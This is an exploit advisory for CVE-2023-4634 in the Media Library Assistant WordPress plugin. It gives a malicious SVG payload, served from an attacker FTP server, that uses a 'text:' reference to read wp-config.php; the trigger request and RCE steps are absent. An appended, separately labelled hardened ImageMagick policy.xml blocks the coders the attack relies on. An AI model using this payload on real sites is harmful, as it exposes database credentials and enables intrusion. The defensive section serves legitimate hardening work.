Media Library Assistant Wordpress Plugin Exploit, RCE and LFI

# Exploit Title: Media Library Assistant Wordpress Plugin - RCE and LFI
# Date: 2023/09/05
# CVE: CVE-2023-4634
# Exploit Author: Florent MONTEL / / @Pepitoh / Twitter @Pepito_oh
# Exploitation path:
# Exploit:
# Vendor Homepage:
# Software Link:
# Version: < 3.10
# Tested on: 3.09
# Description:
# Media Library Assistant WordPress Plugin in versions < 3.10 is affected by an unauthenticated remote reference passed to an Imagick() conversion, which allows an attacker to perform LFI and RCE depending on the Imagick configuration on the remote server. The affected page is: wp-content/plugins/media-library-assistant/includes/mla-stream-image.php


Steps to trigger conversion of a remote SVG

Create a remote FTP server at ftp://X.X.X.X:21 (http will not work, see references)

Host 2 files:
- malicious.svg
- malicious.svg[1]

For LFI, getting wp-config.php:

Both malicious.svg and malicious.svg[1] on the remote FTP:

<svg width="500" height="500">
<image xlink:href="text:../../../../wp-config.php" width="500" height="500" />
</svg>

Then trigger conversion with:

# Directory listing or RCE:
Achieving a directory listing or even RCE is a little more complicated.

Use exploit available here:

# Note
Exploitation will depend on the policy.xml Imagick configuration file installed on the remote server. All exploitation paths and scripts were run against a default WordPress configuration and installation (a WordPress install is very likely to have the default Imagick configuration).
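Added defensive example, not part of this advisory: a hardened ImageMagick policy.xml fragment that denies the coders this path relies on (the FTP/URL fetch of the remote SVG, the TEXT coder behind the "text:" read of wp-config.php, and the SVG/MSVG/MVG parsers). The file path and the assumption that the site does not need ImageMagick to read these formats are mine; upgrading the plugin to 3.10 remains the actual fix.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!-- Assumed location on Debian/Ubuntu: /etc/ImageMagick-6/policy.xml
     (ImageMagick 7 uses /etc/ImageMagick-7/policy.xml). Merge these
     entries into the existing <policymap>; do not replace other rules. -->
<policymap>
  <!-- Remote fetch coders: blocks ftp://... (and http/https) references
       inside an image, which is how the attacker-hosted SVG is pulled in. -->
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="FTP" />
  <policy domain="coder" rights="none" pattern="HTTP" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <!-- TEXT coder: "text:<path>" renders an arbitrary file as an image,
       which is the local file read used for wp-config.php above. -->
  <policy domain="coder" rights="none" pattern="TEXT" />
  <!-- SVG family: xlink:href inside an SVG is what carries the text: URI. -->
  <policy domain="coder" rights="none" pattern="SVG" />
  <policy domain="coder" rights="none" pattern="MSVG" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <!-- Usual defaults worth keeping: no @file indirection, no Ghostscript. -->
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="PS" />
  <policy domain="coder" rights="none" pattern="EPS" />
  <policy domain="coder" rights="none" pattern="PDF" />
  <policy domain="path" rights="none" pattern="@*" />
</policymap>
```

Check the effective policy with `convert -list policy` (ImageMagick 6) or `magick -list policy` (ImageMagick 7); the denied patterns should appear under the coder domain with rights "None".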
